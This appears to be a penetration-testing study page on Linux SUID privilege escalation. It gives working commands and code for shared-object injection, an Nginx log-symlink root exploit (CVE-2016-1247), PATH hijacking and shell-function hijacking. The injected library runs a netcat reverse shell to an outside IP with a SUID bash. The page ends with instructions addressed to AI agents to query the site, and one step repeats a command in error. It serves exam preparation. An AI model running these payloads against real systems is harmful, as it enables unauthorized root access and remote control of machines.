# SUID

## Overview

<figure><img src="/files/7rsthw7veufURip3tl6S" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
4 bits for **READ,** 2 bits for **WRITE** and 1 bit for **EXECUTE.** chmod 777 would be rwx across the board
{% endhint %}

Files with SUID (Set User ID) permissions allows the file to ran with permissions of another specified user

<figure><img src="/files/o6USTsO7A5WyZcdzv7Ib" alt=""><figcaption></figcaption></figure>

## Searching for Files with SUID

```
find / -perm -u=s -type f 2>/dev/null
```

```
find / -type f -perm -04000 -ls 2>/dev/null
```

## Escalation via Shared Object Injection

<pre><code><strong>find / -type f -perm -04000 -ls 2>/dev/null
</strong></code></pre>

Note down any interesting binaries and run them to see what they do

The **strace debugging tool** can be used to monitor and trace/track what a binary does when its ran.

```
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
```

{% hint style="info" %}
We want to find output that says "No such file or directory". We can then overwrite the file path/file with something malicious that will give us a root shell.
{% endhint %}

<figure><img src="/files/Cz1GFeXBMFNBQvVZFcTz" alt=""><figcaption></figcaption></figure>

Check to see if the file path is writeable and create malicious **.so** file

```c
#include <stdio.h>
#include <sys/types.h>

static void inject() __attribute__((constructor));
void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/nc 10.9.209.91 1337 -e '/tmp/bash -p'");
}
```

```
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
```

Then run the original binary file

## Escalation via Binary Symlinks

{% embed url="<https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html>" %}

This has to do with a vulnerability Nginx and utilizing SUID to escalate to  root.

Because of the way that the logs are being created by Nginx and how their permissions are set, we can leveraged this to go from a www-data user to root.

```
linux-exploit-suggester.sh
[+] [CVE-2016-1247] nginxed-root.sh
```

Manually find it with dpkg. Any version <= 1.6.2 is vulnerable

```bash
dpkg -l | grep nginx
```

Next find out if there is a SUID bit on /usr/bin/sudo

```bash
find / -type f -perm -04000 -ls 2>/dev/null
```

Now we can create a Symlink between one of the Nginx log files and a malicious file so when it runs it runs as root

{% hint style="info" %}
We need a startup/restart of the Nginx server for the malicious file to run
{% endhint %}

Run the nginxed-root.sh tool and wait for Nginx to restart

## Escalation via Environmental Variables

Environmental variables are variables that are available system wide and are inherited spawned by all child processes and shells

Check what the environmental variables on the machine are

```
env
```

Find a binary with the SUID bit

```
find / -type f -perm -04000 -ls 2>/dev/null
```

Read the strings of binary files

```
strings /usr/local/bin/suid-env
```

While digging through the files you may come across the program trying to run another binary just by its name without using the full path. It can only do this because of the **/usr/local/bin** environment variable set in the shell.&#x20;

<figure><img src="/files/ffFVCDCBra1ZVEZeTlxE" alt=""><figcaption></figcaption></figure>

We can exploit this by changing the env binary path of **service** and replacing it with a malicious **service** binary file

Spawn root shell binary file as a one liner

```bash
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
```

Compile

```bash
gcc /tmp/service.c -o /tmp/service
```

Change the $PATH variable and call the orginal binary

```
export PATH=/tmp:$PATH
/usr/local/bin/suid-env
```

### ALTERNATIVE

In the case that the binary is calling a full path a function with the name **service** can be made with that spawns a new shell

```bash
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```

export the function ( the -f means **refer to shell function**)

```bash
export -f /usr/sbin/service
```

Run the original binary

```bash
export -f /usr/sbin/service
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/linux-privilege-escalation/suid.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.